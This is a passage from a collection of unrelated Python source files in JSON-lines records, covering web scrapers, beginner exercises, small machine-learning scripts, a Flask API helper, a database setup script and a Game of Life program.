\"\"\"Concatenates all text in the subelements into one string\"\"\"\n return u\"\".join([x for x in element.itertext()]).strip().replace(\"\\n\",\n \" \")\n\ndef get_nhlid_from_tablerow(tr):\n \"\"\"Get player ID from href inside the row\"\"\"\n anchor_tag = tr.find(\".//a[@href]\")\n\n if anchor_tag is not None:\n href = anchor_tag.attrib['href']\n if re.match(r\"^/ice/player.htm\", href):\n qs = urlparse(href).query\n return parse_qs(qs).get(\"id\", None)[0]\n\n\ndef get_table_columns(table):\n \"\"\"Returns the column names for the table.\n We skips first col, as it's only the row number.\n We add NHL ID and Number columns in the beginnnig.\n \"\"\"\n thead = table.find(\"thead\")\n columns = [stringify(th) for th in thead.findall(\".//th\")]\n return ['nhl_id', 'number'] + columns[1:]\n\n\ndef get_table_pages_urls(url):\n \"\"\"Gets URLS for pages of the table at the given URL\"\"\"\n\n doc = getdoc(url)\n\n urls = []\n pages_div = doc.find(\".//div[@class='pages']\")\n\n #Check for empty table\n if pages_div is None:\n return urls\n\n #Check for one page table\n page_anchors = pages_div.findall(\"a\")\n if len(page_anchors) < 1:\n urls.append(url) # One page table\n return urls\n\n #Get the last page anchor\n last_anchor = page_anchors[-1]\n last_anchor_href = last_anchor.get(\"href\")\n\n #Get the number of the last page\n pattern = re.compile(r\"(\\d+)\")\n number_of_pages = pattern.findall(last_anchor_href)[-1]\n\n #Load all pages\n nhl_base_url = \"http://www.nhl.com\"\n for p in range(1, int(number_of_pages) + 1):\n page_url = last_anchor_href.replace(\"pg=\" + number_of_pages,\n \"pg=\" + str(p))\n urls.append(nhl_base_url + page_url)\n\n return urls\n\n\ndef readrows(urls, limit=None):\n \"\"\"Reads all or a limited numbers of rows from the table\"\"\"\n\n row_counter = 0\n for url in urls:\n\n doc = getdoc(url)\n\n table = doc.find(\".//table[@class='data stats data-table table-origin']\")\n\n if row_counter == 0:\n yield get_table_columns(table)\n\n tbody = table.find(\"tbody\")\n\n if tbody is None:\n raise StopIteration\n\n for tr in tbody.findall('tr'):\n\n if limit is not None and row_counter == limit:\n raise StopIteration\n\n nhl_id = get_nhlid_from_tablerow(tr)\n\n data = [nhl_id] + [stringify(td) for td in tr.findall(\"td\")]\n\n yield data\n\n row_counter += 1\n\n\nclass Query:\n \"\"\"Query for playerstats\"\"\"\n\n PLAYERSTATS_URL = \"http://www.nhl.com/ice/playerstats.htm\"\n\n def __str__(self):\n return self.url()\n\n def season(self, s):\n if 
re.match(r\"\\d{8}\", s):\n self.season = s\n return self\n\n def gametype(self, gt):\n if gt == 'regular':\n self.gameType = 2\n elif gt == 'playoffs':\n self.gameType = 3\n return self\n\n def team(self, t):\n if re.match(r\"[A-Z]{3}\", t):\n self.team = t\n return self\n\n def country(self, c):\n if re.match(r\"[A-Z]{3}\", c):\n self.country = c\n return self\n\n def position(self, p):\n if p in (\"S\", \"C\", \"D\", \"F\", \"G\", \"L\", \"R\"):\n self.position = p\n return self\n\n def report(self, r):\n if r in ('bios', 'summary'):\n self.viewName = r\n return self\n\n def url(self):\n \"\"\"Builds the URL based on parameters\"\"\"\n if self.position == 'G' and self.viewName == 'bios':\n self.viewName = 'goalieBios'\n\n query = self.__dict__\n\n url = Query.PLAYERSTATS_URL + \"?\" + urlencode(query)\n\n return url\n\n def run(self, limit=None):\n urls = get_table_pages_urls(self.url())\n print (urls)\n return readrows(urls, limit)\n\n def fetch(self, limit=None):\n result = []\n for p in self.run(limit):\n result.append(p)\n return result\n\n def __iter__(self):\n return self.run()\n\n\nclass Player:\n \"\"\"Represent an NHL player on nhl.com\"\"\"\n\n CAREER_URL = \"http://www.nhl.com/ice/player.htm?id={}\"\n\n def __init__(self, player_id):\n \"\"\"Loads the player stats page as an ElementTree\"\"\"\n url = Player.CAREER_URL.format(player_id)\n self.doc = getdoc(url)\n\n @property\n def twitter(self):\n \"\"\"Gets the players twitter handle or None\"\"\"\n twitter_tag = self.doc.find(\".//a[@class='twitter-follow-button']\")\n if twitter_tag is not None:\n return twitter_tag.get(\"href\").split(\"/\")[-1]\n\n @property\n def tables(self):\n \"\"\"Grabs all career tables from the player page.\"\"\"\n\n playerstats_tables = []\n\n for table in self.doc.findall(\".//table[@class='data playerStats']\"):\n\n headers = [th.text for th in table.findall(\".//th\")]\n\n table_group = [headers]\n\n for row_i in table.findall(\".//tr\")[1:]:\n\n data = [stringify(td) for td in row_i.findall(\"td\")]\n\n table_group.append(data)\n\n playerstats_tables.append(table_group)\n\n return playerstats_tables\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Read playerstats from nhl.com')\n parser.add_argument('seasons', metavar='Seasons', help='e.g. 
20142015')\n parser.add_argument('-p', '--pos', dest='position',\n action='store',\n default=\"S\",\n choices=('S', 'G', 'D', 'L', 'R', 'C'),\n help='Player position')\n parser.add_argument('-g', '--gametype', dest='gametype',\n action='store',\n default=\"regular\",\n choices=('regular', 'playoffs'),\n help='Gametype')\n parser.add_argument('-r', '--report', dest='report',\n action='store',\n default=\"summary\",\n choices=('bios', 'summary'),\n help='Report')\n args = parser.parse_args()\n\n q = Query()\n q.season(args.seasons)\n q.gametype(args.gametype)\n q.position(args.position)\n q.report(args.report)\n\n writer = csv.writer(sys.stdout)\n writer.writerows(q)\n\n\nif __name__ == '__main__':\n import argparse\n import csv\n import sys\n main()\n","sub_path":"nhl.py","file_name":"nhl.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"470799880","text":"def test():\n # 条件判断\n age = 11\n if age >= 18:\n print('you age is', age)\n print('adult')\n elif age >= 6:\n print('teenage')\n else:\n print('you age is', age)\n print('kid')\n # Python 语法与缩进的距离有关系 ,条件语句一定要缩放,不然会有语法错误\n print('if else外面')\n\n # 语法格式\n # if <条件判断1>:\n # <执行1>\n # elif <条件判断2>:\n # <执行2>\n # elif <条件判断3>:\n # <执行3>\n # else:\n # <执行4>\n\n # 输入条件\n birth = int(input('input the birth of year: '))\n if birth < 2000:\n print('00前')\n else:\n print('00后')\n\n\ndef BMI():\n hight = float(input('请输入身高 例如:1.75 '))\n weight = float(input('请输入体重 例如:80.5 '))\n bmi = weight / (hight * hight)\n if bmi < 18.5:\n print('过轻')\n elif bmi >= 18.5 and bmi < 25:\n print('正常')\n elif bmi >= 25 and bmi < 28:\n print('过重')\n elif bmi >= 28 and bmi < 32:\n print('肥胖')\n elif bmi >= 32:\n print('严重肥胖')\n print('bmi=', bmi)\n\n\ndef main():\n test()\n BMI()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python_exercise/condition.py","file_name":"condition.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"524110975","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import neighbors\nfrom sklearn.ensemble import RandomForestClassifier\nimport time\nfrom sklearn import preprocessing\n\n\ndef load_data(path):\n '''\n :param path: 输入文件所在文件夹地址\n :return: x属性,y标签,test属性\n '''\n\n df = pd.read_csv(path + 'train.csv', sep=',')\n data = df.values\n x_train = preprocessing.binarize(data[:, 1:]) # 第0列就是标签,2分化一下会不会好一点\n y_train = data[:, 0]\n\n test_file = pd.read_csv(path + 'test.csv', sep=',')\n test_data = preprocessing.binarize(test_file.values)\n x_test = test_data\n\n return x_train, y_train, x_test\n\n\ndef predict(path):\n x_train, y_train, x_test = load_data(path)\n\n logClf = RandomForestClassifier()\n logClf.fit(x_train, y_train)\n\n preResult = logClf.predict(x_test)\n\n writeFile = open(path + 'submit1.csv', 'w')\n writeFile.write('ImageId,Label\\n') # 第一行标题\n\n n = len(preResult)\n for i in range(n):\n writeFile.write('%d,%d\\n' % (i + 1, preResult[i]))\n writeFile.close()\n\n\ndef test(path):\n start_time = time.time()\n predict(path)\n end_time = time.time()\n print('done in ' + str(end_time - start_time) + ' seconds.')\n print('done in ' + str((end_time - start_time) / 60) + ' 
minutes.')\n\n\npath='/Users/zhouang/Downloads/kaggle/识别数字/'\ntest(path)\n","sub_path":"Digit_Recognizer.py","file_name":"Digit_Recognizer.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"106095003","text":"# Test Interface\n\nfrom Tkinter import *\nimport RPSgame_Interface\nimport os\n\nroot = Tk()\nroot.title(\"Game Collection\")\n\nmainframe = Frame(root, height=200, width=500)\nmainframe.pack_propagate(0)\nmainframe.pack(padx=5, pady=5)\n\nintro = Label(mainframe, text=\"Choose a game to play\")\nintro.pack(side=TOP)\n\nrps_game = Button(mainframe, text=\"Rock, Paper, Scissors\", command=RPSgame_Interface.gui)\nrps_game.pack()\n\nexit_button = Button(mainframe, text=\"Quit\", command=root.destroy)\nexit_button.pack(side=BOTTOM)\n\nos.system('''/usr/bin/osascript -e 'tell app \"Finder\" to set frontmost of process \"Python\" to true' ''')\nroot.mainloop()\n","sub_path":"testInterface.py","file_name":"testInterface.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"52747441","text":"from sklearn.linear_model import Lasso,LogisticRegression,Ridge\nimport pandas as pd\nimport numpy as np\ndef lasso(file):\n dataset = pd.read_csv(file,engine='python').dropna(axis=1)\n features_name = dataset.columns.values.tolist()\n dataset = np.array(dataset)\n\n X = dataset[:, 1:]\n y = dataset[:, 0]\n\n lasso = Lasso()\n lasso.fit(X, y)\n result = [(x, y) for x, y in zip(features_name[1:], lasso.coef_)]\n result1 = sorted(result, key=lambda x: abs(x[1]), reverse=True)\n\n\n ridge = Ridge()\n ridge.fit(X, y)\n result = [(x, y) for x, y in zip(features_name[1:], ridge.coef_)]\n result2 = sorted(result, key=lambda x: abs(x[1]), reverse=True)\n\n\n logistic = LogisticRegression()\n logistic.fit(X, y)\n\n result = [(x, y) for x, y in zip(features_name[1:], logistic.coef_[0])]\n result3 = sorted(result, key=lambda x: abs(x[1]), reverse=True)\n\n\n\n\n # keep only features whose coefficient magnitude is effectively non-zero\n return ([x[0] for x in result1 if abs(x[1]) > 1e-13],\n [x[0] for x in result2 if abs(x[1]) > 1e-13],\n [x[0] for x in result3 if abs(x[1]) > 1e-13])\n\ndef run(csvfile,logger):\n logger.info('linear model start...')\n feature_list = lasso(csvfile)\n\n logger.info('linear model end.')\n return feature_list\n#\n# filepath = r'J:\\\u591a\u8bbe\u5907\u5171\u4eab\\work\\MRMD2.0-github\\mixfeature_frequency_DBD.csv'\n# result = lasso(filepath)","sub_path":"feature_selection/linear_model.py","file_name":"linear_model.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
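A hypothetical driver for the feature_selection record above; the logger name is illustrative, and the CSV filename is taken from the record's own commented-out test line, assuming the same label-first column layout:

import logging

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("mrmd2")

# run() returns the three ranked feature lists (Lasso, Ridge, LogisticRegression).
lasso_feats, ridge_feats, logistic_feats = run("mixfeature_frequency_DBD.csv", logger)
print("Lasso kept %d features" % len(lasso_feats))

{"seq_id":"506885546","text":"from billion_prices_india.spiders.BasePepperFry import BasePepperFry\n\n__author__ = 'sats'\n\n\nclass PepperFry(BasePepperFry):\n \"\"\"Scrape pet supplies tab from pepper fry\"\"\"\n name = \"pf_bedbath\"\n start_urls = ['http://www.pepperfry.com/bed-bath-%s.html' % s for s in\n ['bed-sheets', 'combo-offers', 'bed-covers', 'duvet-covers', 'blankets-quilts', 'bedding-diwan-sets',\n 'pillow-covers', 'pillow-inserts', 'mattresses', 'diwan-sets', 'mirrors', 'yoga-mats', 'bath-mats',\n 'bathroom-scales', 'bath-robes-gowns', 'towels', 'bathroom-cabinets', 'bathroom-shelves',\n 'towel-holders', 'toilet-paper-holders', 'bathroom-tumblers', 'clothes-hooks', 'personal-grooming',\n 'soap-dishes',\n 'soap-dispensers', 'cotton-swab-holders', 'bath-sets', 'sanitary-ware-showers',\n 'sanitary-ware-faucets', 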
'sanitary-ware-stop-cocks-and-angles', 'sanitary-ware-mixers',\n 'sanitary-ware-floor-drains', 'sanitary-ware-cisterns', 'sanitary-ware-pipes-hoses', 'kids']]\n\n\n","sub_path":"billion_prices_india/billion_prices_india/spiders/pf_bedbath.py","file_name":"pf_bedbath.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"213570904","text":"import traceback\n\nfrom flask_restplus import Api\nfrom sqlalchemy.orm.exc import NoResultFound\n# from log import log\nfrom log import log\n\napi = Api(version='1', title='flask_api_example',\n description='flask_api_example')\n\nfun_dict = {\n 'resp_204': api.response(\n 204,\n 'successfully updated.'),\n 'resp_401': api.response(\n 401,\n 'token auth fail.'),\n 'resp_403': api.response(\n 403,\n 'access forbidden.'),\n 'resp_404': api.response(\n 404,\n 'no result found or update object not exist'),\n 'expect': api.expect,\n 'marshal1': api.marshal_with,\n 'marshal2': api.marshal_list_with}\n\n\n@api.errorhandler\ndef default_error_handler(e):\n message = 'An unhandled exception occurred.'\n log.exception(message)\n if not globals()['FLASK_DEBUG']:\n return {'message': message}, 500\n\n\n@api.errorhandler(NoResultFound)\ndef database_not_found_error_handler(e):\n log.warning(traceback.format_exc())\n return {'message': 'A database result was required but none was found.'}, 404\n\n\ndef decorator_compose(*funs):\n def decorator(f):\n for fun in reversed(funs):\n f = fun(f)\n return f\n return decorator\n","sub_path":"api/restplus.py","file_name":"restplus.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542434747","text":"# coding=utf-8\nimport time\nota_hotel_room_type_table = {\n #新增房型前台id,以防止以后出现两个id\n \"room_type_front_id\":\"\",\n \"room_type_id\":\"\",\n \"room_type_name\":\"\",\n \"channel_id\":-1,\n \"ota_bkstg_name\":\"\",\n \"platform_id\":-1,\n \"channel_sub_id\":-1,\n \"hotel_id\":\"\",\n \"room_count\":-1,\n \"desc\":\"\",\n \"area\":\"\",\n \"floor\":\"\",\n \"bed_type\":\"\",\n \"bed_size\":\"\",\n \"bed_count\":-1,\n \"retail_price\":0.0,\n \"max_occupancy\":-1,\n \"has_internet\":-1,\n \"internet_type\":-1,\n \"internet_service\":\"\",\n \"has_window\":-1,\n \"has_own_toilet\":-1,\n \"has_public_toliet\":-1,\n \"has_toiletries\":-1,\n \"has_slippers\":-1,\n \"has_hot_water\":-1,\n \"has_air_conditioning\":-1,\n \"has_fridge\":-1,\n \"has_computer\":-1,\n \"has_tv\":-1,\n \"has_balcony\":-1,\n \"has_kitchen\":-1,\n \"has_bar\":-1,\n \"has_free_ddd\":-1,\n \"has_free_idd\":-1,\n \"can_add_bed\":-1,\n \"add_bed_fee\":\"\",\n \"additional_services\":\"\",\n \"is_hours_room\":-1,\n \"status\":\"\",\n \"reserved_col1\":\"\",\n \"reserved_col2\":\"\",\n \"reserved_col3\":\"\",\n \"reserved_col4\":\"\",\n \"reserved_col5\":\"\",\n \"crawl_version\":\"\",\n \"crawl_time\":time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"sub_rooms\":[]\n }","sub_path":"ycfspider/ycf/ycfspider-for-schedule/ycfspider/tables/ota_hotel_room_type_table.py","file_name":"ota_hotel_room_type_table.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"452451318","text":"import math\nimport sys\n\ndef secim(k):\n\tprint(\"\"\"MATHMATMHMATMAHMATMAHMAHMATMAHM\nToplama için 1\nÇıkarma için 2\nÇarpma için 3\nBölmek için 4\nFaktoriyel için 5\nBüyüye yuvarlamak için 6\nKüçüğe yuvarlamak için 
7\n-----------------\nÇıkmak için Q\nProgram esnasında bu menüye ulaşmak için \\\"geri\\\" yazınız.\nMATMAHMATMAHMATMHMATHMATMHMAHMMA\n\"\"\")\n\n\tk = input()\n\n\tif k == \"1\": \t\n\t\twhile True:\n\t\t\t(toplama(1,2))\n\telif k == \"2\":\n\t\twhile True:\n\t\t\t(cikar(1,2))\n\telif k == \"3\":\n\t\twhile True:\n\t\t\t(çarpma(1,2))\n\telif k == \"4\":\n\t\twhile True:\n\t\t\t(bol(4,3))\n\n\telif k == \"5\":\n\t\twhile True:\n\t\t\t(faktoriyel(4))\n\n\telif k == \"6\":\n\t\twhile True:\n\t\t\t(buyuk_yuvarla(1))\n\n\telif k == \"7\":\n\t\twhile True:\n\t\t\t(kucuk_yuvarla(1))\n\n\telif k == \"q\" or k == \"Q\":\n\t\tsys.exit(\"Çıkılıyor\")\n\n#----------------------------------------------\n\n\ndef toplama(a,b):\n\t# iki sayıyı toplar\n\ta = input(\"İlk sayı:\")\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tb = input(\"İkinci Sayı:\")\n\t\ta = int(a)\n\t\tb = int(b)\n\t\tprint(\"{} + {} = {}\".format(a,b,a+b))\n\n#----------------------------------------------\n\ndef çarpma(a,b):\n\t# iki sayıyı çarpar\n\ta = input(\"İlk sayı:\")\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tb = input(\"ikinci sayı:\")\n\t\ta = int(a)\n\t\tb = int(b)\n\t\tprint(\"{} * {} = {}\".format(a,b,a*b))\n\n#----------------------------------------------\n\ndef bol(a,b):\n\t# iki sayıyı böler\n\ta = input(\"İlk sayı:\")\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tb = input(\"İkinci Sayı:\")\n\t\ta = int(a)\n\t\tb = int(b)\n\t\tprint(\"{} / {} = {}\".format(a,b,a/b))\n\n#----------------------------------------------\n\ndef cikar(a,b):\n\t# iki sayıyı çıkarır\n\ta = input(\"İlk sayı:\")\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tb = input(\"İkinci Sayı:\")\n\t\ta = int(a)\n\t\tb = int(b)\n\t\tprint(\"{} - {} = {}\".format(a,b,a-b))\n\n#----------------------------------------------\n\n\ndef faktoriyel(sayı):\n\t#sayının faktoriyelini bulan fonksiyon\n\tsayı = input(\"Sayı:\")\n\tif sayı == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tsayı = float(sayı)\n\t\tprint(\"Girdiğin sayının faktoriyeli.\",math.factorial(sayı))\n\n#----------------------------------------------\n\ndef kucuk_yuvarla(a):\n\t# float girilen sayıyı en küçüğe yuvarlar\n\ta = float(input(\"Sayı:\"))\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tprint(\"Küçüğe Yuvarlanmış hali:\",math.floor(a))\n\n#----------------------------------------------\n\ndef buyuk_yuvarla(a):\n\t# float girilen sayıyı en küçüğe yuvarlar\n\ta = float(input(\"Sayı:\"))\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tprint(\"Büyüğe Yuvarlanmış hali:\",math.ceil(a))\n\n#----------------------------------------------\n\nsecim(1)\n","sub_path":"hesapmakinesi.py","file_name":"hesapmakinesi.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"509545968","text":"#IMPORTS\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport time\nimport cv2\n\n#CONSTANTS\nSHAPE = (300, 500)\nFRAME_RATE = 85\n#SETUP\ncamera = PiCamera()\ncamera.resolution = SHAPE\ncamera.framerate = FRAME_RATE\nraw = PiRGBArray(camera, size=SHAPE)\n\n#IMPLEMENTATION\ntime.sleep(0.1)\n\nfor frame in camera.capture_continuous(raw, format=\"bgr\", use_video_port=True):\n\timage = frame.array\n\tcv2.imshow(\"Video Stream\", image)\n\tkey = cv2.waitKey(1) & 0xFF\n\traw.truncate(0)\n\tif key == 
ord(\"q\"):\n\t\tbreak\n","sub_path":"cam_script.py","file_name":"cam_script.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"127155405","text":"\"\"\"\nDivide array into max sets containing equal no of 1s and 0s\n\"\"\"\n\nif __name__ == \"__main__\":\n s = str(input())\n ct, c0, c1 = 0, 0, 0\n if(s.count('0') != s.count('1')):\n ct = -1\n print(ct)\n exit()\n for i in range(0, len(s)):\n if(s[i] == '0'):\n c0 += 1\n elif(s[i] == '1'):\n c1 += 1\n if(c0 > 0 and c1 > 0 and c0==c1):\n print(c0, c1)\n ct += 1\n c0, c1 = 0, 0\n print(ct)\n #input: 0100010101 output: -1\n #input: 0100110101 output: 4\n #input: 0111100001 output: 3\n","sub_path":"Basics/equal0and1s.py","file_name":"equal0and1s.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"272645837","text":"import urllib.request\nimport urllib.parse\nimport requests\nimport json\nimport ssl\n\n\ndef fanyi_urllib(keyword):\n # urllib 版本\n\n context = ssl._create_unverified_context()\n data_dic = {'kw': keyword}\n url = 'https://fanyi.baidu.com/sug'\n headers = {'content-length': '8'}\n\n data = urllib.parse.urlencode(data_dic)\n # print(data)\n req = urllib.request.Request(url=url, data=bytes(data, encoding='utf-8'))\n res = urllib.request.urlopen(req, context=context)\n html = res.read().decode('utf-8')\n\n res_dic = json.loads(html)\n\n print(res_dic['data'][0]['v'])\n\n\ndef fanyi_requests(keyword):\n # requests 版本\n url = 'https://fanyi.baidu.com/sug'\n data = {'kw': keyword}\n\n res = requests.post(url=url, data=data)\n\n html = res.content.decode('utf-8')\n\n html_json = json.loads(html)\n print(html_json['data'][0]['v'])\n\n\nif __name__ == '__main__':\n while True:\n x = input(\"请输入你想翻译的词语,q退出:\")\n if x == 'q':\n break\n fanyi_requests(x)","sub_path":"Baidu_Fanyi.py","file_name":"Baidu_Fanyi.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"605877259","text":"#!/usr/bin/python2.7\n# Copyright 2012 JatLeGo Inc. 
All Rights Reserved.\n# Author: andyzh1314@gmail.com (Andy Zhau)\n\nimport unittest\n\nfrom dsc.framework import component\nfrom dsc.framework import renderer\nfrom dsc.framework import test_util\n\n\nclass RendererTest(unittest.TestCase):\n\n\n def test_base_renderer(self):\n r = renderer.Renderer()\n c = component.ComponentContent(None, \"foo\", r)\n self.assertEquals(\"foo\", r.RenderContent(c))\n\n def test_json_renderer(self):\n data = {\"foo\": \"bar\", \"fooarr\": [\"foo\", \"bar\"]}\n r = renderer.JsonRenderer()\n c = component.ComponentContent(test_util.FakeDscData(), data, r)\n self.assertEquals('{\"foo\":\"bar\",\"fooarr\":[\"foo\",\"bar\"]}',\n r.RenderContent(c))\n\n def test_json_with_debug(self):\n data = {\"foo\": \"bar\", \"fooarr\": [\"foo\", \"bar\"]}\n r = renderer.JsonRenderer()\n c = component.ComponentContent(test_util.FakeDscData(\n debug_parameters={\"h\": \"\"}), data, r)\n golden_result = (\n\"\"\"{\n \"foo\": \"bar\",\n \"fooarr\": [\n \"foo\",\n \"bar\"\n ]\n}\"\"\")\n self.assertEquals(golden_result, r.RenderContent(c))\n\n def test_django_template_error(self):\n data = {\"foo\": \"bar\", \"fooarr\": [\"foo\", \"bar\"]}\n r = renderer.DjangoTemplateRenderer(\"foo/bar.html\")\n c = component.ComponentContent(test_util.FakeDscData(\n debug_parameters={\"h\": \"\"}), data, r)\n self.assertRaises(ImportError, r.RenderContent, c)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"dsc/framework/renderer_test.py","file_name":"renderer_test.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"148139876","text":"adj = [\"red\", \"big\", \"tasty\"]\nfruits = [\"apple\", \"banana\", \"cherry\"]\n\nfor x in adj:\n for y in fruits:\n print(x, y)\n \nnums = [1,2,3,4]\n\nit = iter(nums)\n\nprint(next(it)) #prints 1 and only 2,3,4 will be in the iterator\n\nfor x in it:\n print(x) #prints 2,3,4\n\n \n# it = iter(nums)\n \n# while True:\n# print (next(it))\n","sub_path":"PythonProject/src/Loops.py","file_name":"Loops.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
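The Loops.py record above leans on the iterator protocol implicitly; a short standard-library-only sketch, not part of the dataset, of the same mechanics with the StopIteration handled by hand:

nums = [1, 2, 3, 4]
it = iter(nums)

while True:
    try:
        value = next(it)
    except StopIteration:
        break  # this is exactly what a for-loop does for you
    print(value)

# next() can also take a default instead of raising StopIteration:
it = iter(nums)
print(next(it, None))  # -> 1

{"seq_id":"108109740","text":"#!/usr/bin/python\n\nimport sys\nsys.path.append(\"..\")\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom data_model import Base, Minigame, Transition\nfrom config import Config\n\nclass DatabaseBuilder():\n _config = None\n\n def __init__(self, _config):\n self._config = _config\n\n def build_database(self):\n self._create_database()\n self._populate_database_schema()\n\n def rebuild_database(self):\n # Let's not drop the db in PROD, just to be safe :)\n self._drop_database()\n self._create_database()\n self._populate_database_schema()\n\n def _get_engine(self, database=\"\"):\n connection_string = ('mysql://%s:%s@%s/%s' %\n (self._config.DATABASE_USERNAME,\n self._config.DATABASE_PASSWORD,\n self._config.DATABASE_SERVER,\n database))\n engine = create_engine(\n connection_string,\n encoding=\"utf8\",\n echo=True)\n return engine\n\n def _create_database(self):\n engine = self._get_engine()\n conn = engine.connect()\n # Do not substitute user-supplied database names here.\n conn.execute(\"CREATE DATABASE `%s`\" % self._config.DATABASE_NAME)\n conn.execute(\"COMMIT\")\n conn.close()\n\n def _populate_database_schema(self):\n # Get a new engine for the just-created database and create a table.\n engine = 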
self._get_engine(self._config.DATABASE_NAME)\n conn = engine.connect()\n Base.metadata.create_all(engine)\n conn.execute(\"COMMIT\")\n conn.close()\n\n session = scoped_session(sessionmaker(\n autocommit=False,\n autoflush=False,\n bind=engine))\n\n session.add(Minigame(MinigameId=1, Name=\"Art Master\"))\n session.add(Transition(MinigameId=1, StateTo=0))\n session.add(Transition(MinigameId=1, StateFrom=0, StateTo=2))\n session.add(Transition(MinigameId=1, StateFrom=2, StateTo=3))\n session.add(Transition(MinigameId=1, StateFrom=3, StateTo=4))\n\n session.add(Minigame(MinigameId=2, Name=\"Sentenced To Death\"))\n session.add(Transition(MinigameId=2, StateTo=1))\n session.add(Transition(MinigameId=2, StateFrom=1, StateTo=2))\n session.add(Transition(MinigameId=2, StateFrom=2, StateTo=3))\n session.add(Transition(MinigameId=2, StateFrom=3, StateTo=4))\n session.commit()\n session.close()\n\n def _drop_database(self):\n engine = self._get_engine()\n conn = engine.connect()\n conn.execute(\"DROP DATABASE IF EXISTS `%s`\" % self._config.DATABASE_NAME)\n conn.execute(\"COMMIT\")\n conn.close()\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n usage = (\n \"Usage: ./create_database.py ARGS\\n\"\n \"--dev\\tcreate dev database\\n\"\n \"--prod\\tcreate prod database\")\n print(usage)\n elif sys.argv[1] == \"--prod\":\n db_builder = DatabaseBuilder(Config)\n db_builder.build_database()\n elif sys.argv[1] == \"--dev\":\n db_builder = DatabaseBuilder(Config)\n db_builder.rebuild_database()\n else:\n print(\"Invalid arguments\")\n","sub_path":"service/artmaster/artmaster/database/create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"319417346","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nejercicio 4\r\nWrite a Python program to read a file line by line and store it into a list.\r\n\r\n\"\"\"\r\n\r\ndef file_read(fname):\r\n with open(fname) as f:\r\n content_list = f.readlines()\r\n print(content_list)\r\n\r\nfile_read('eduardo.txt')","sub_path":"pythonfile/exer4.py","file_name":"exer4.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"97897068","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the birthdayCakeCandles function below.\r\ndef birthdayCakeCandles(ar):\r\n birth=ar[0]\r\n t=0\r\n count=0\r\n while t<len(ar):\r\n if ar[t]>birth:\r\n birth=ar[t]\r\n t+=1\r\n d=0\r\n while d
moduleauthor:: Joshua Freimark\n\"\"\"\n# allow for input from terminal\nfrom sys import argv\n\ndef neighbors(grid, row, cell):\n \"\"\"\n Calculate the sum of the neighbors of element being evaluated\n :param row, cell: arguements for cells active\n :type integers: a integer object from grid\n\n :return: the sum of neighbors to make decision\n :rtype: integer\n \"\"\"\n on_count = (grid[row-1][cell-1] + grid[row-1][cell] + grid[row-1][cell+1] +\n grid[row][cell-1] + (grid[row][cell]*0)+ grid[row][cell+1] +\n grid[row+1][cell-1] + grid[row +1][cell] + grid[row +1][cell+1])\n return on_count\n\ndef make_move( grid, nrows, ncols):\n \"\"\"\n Function iterates over grid and evaluates the neigbors of '0'/'1' values\n :param grid,row, cell: arguements for iterating over grid\n :type lists, integers: Array of lists, and integer object from grid\n\n :return: the new grid\n :rtype: Array/2-d list\n \"\"\"\n new_grid = [[0] * ncols for i in range(nrows)] # For new grid to post decisions\n for row in range(nrows-1):\n for cell in range(ncols-1):\n on_count = neighbors(grid, row, cell)\n if grid[row][cell] == 1: # If cells alive\n if (on_count == 2) or (on_count == 3):\n new_grid[row][cell] = 1 # b. 